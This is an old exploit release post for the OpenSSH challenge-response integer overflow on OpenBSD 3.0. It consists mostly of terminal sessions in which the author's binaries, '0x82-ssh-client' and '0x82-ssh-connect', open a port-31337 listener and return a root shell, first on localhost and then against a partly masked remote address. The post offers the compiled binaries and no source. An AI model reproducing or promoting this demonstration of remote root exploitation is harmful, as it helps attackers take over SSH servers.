OpenSSH Challenge-Response Integer, Buffer Overflow Exploit v0.000000002 ++ Update ++ Hello. I see OpenSSH vulnerability that was found in last July. Because free OpenBSD machine was given to me. :-D This is 'Proof of concept' only. Already, because present very good written advisory ISS or GOBBLES. I read and enjoy it. ++! In my machine very interesting result serving example I test finish. First, test example. This tested in OpenBSD 3.0 machines only. It may pass with perhaps other OpenSSH version. :-) __ $ ls -al /home/x82/.ssh ls: /root/.ssh: No such file or directory $ ./0x82-ssh-client localhost The authenticity of host 'localhost (127.0.0.1)' can't be established. RSA key fingerprint is 39:72:26:68:b1:2a:67:46:f8:02:ef:fa:b7:91:8b:30. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'localhost' (RSA) to the list of known hosts. ^C $ netstat -an Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp 0 0 *.31337 *.* LISTEN ... $ ls -al /home/x82/.ssh/ total 3 drwx------ 2 x82 x82 512 Jan 23 07:10 . drwxr-xr-x 3 x82 x82 512 Jan 23 07:10 .. -rw-r--r-- 1 x82 x82 219 Jan 23 07:10 known_hosts $ -- HeHeHe, It may deliver 31337 rootshell to you. OK. Next, funny job. :-) __ $ ./0x82-ssh-client -l root 61.xx.xx.xx ^C $ ./0x82-ssh-connect -t ++ OpenSSH Remote exploit 31337 connect code! code by Xpl017Elz. --++TEST++TEST++TEST++TEST++-- ++ Test connecting, http://x82.inetcop.org ++ hehe, OK. :-) --++31337++31337++31337++31337++-- ++ Real connecting, localhost:31337 ++ Connected to localhost:31337 ! ++ Executed shell successfully ! ** OK, It's Rootshell OpenBSD testsub 3.0 GENERIC#94 i386 uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) sh: No controlling tty (open /dev/tty: Device not configured) sh: Can't find tty file descriptor sh: warning: won't have full job control # exit ** Happy Exploit ! $ -- Yahooo! It's most pleasant if use 0x82-ssh-connect. These is all OpenBSD Binaries. OpenBSD Binaries: # file 0x82-ssh-client 0x82-ssh-client: OpenBSD/i386 demand paged dynamically linked executable not stripped # file 0x82-ssh-connect 0x82-ssh-connect: OpenBSD/i386 demand paged dynamically linked executable not stripped # Requirement and questions about this. Never send to me. Reply availability is my freedom. If it reads very excellent ISS, GOBBLES Advisory, you can know ! And this code is not Backdoor code. A person who desire source code is very regrettable. Thank you. P.S: Sorry, for my poor english. Ah, only... I may exhibit exploit source code to Korean. It's development of the country. -- By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security. MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com INetCop Security Home: http://www.inetcop.org (Korean hacking game) My World: http://x82.i21c.net & http://x82.inetcop.org GPG public key: http://wizard.underattack.co.kr/~x82/h0me/pr0file/x82.k3y --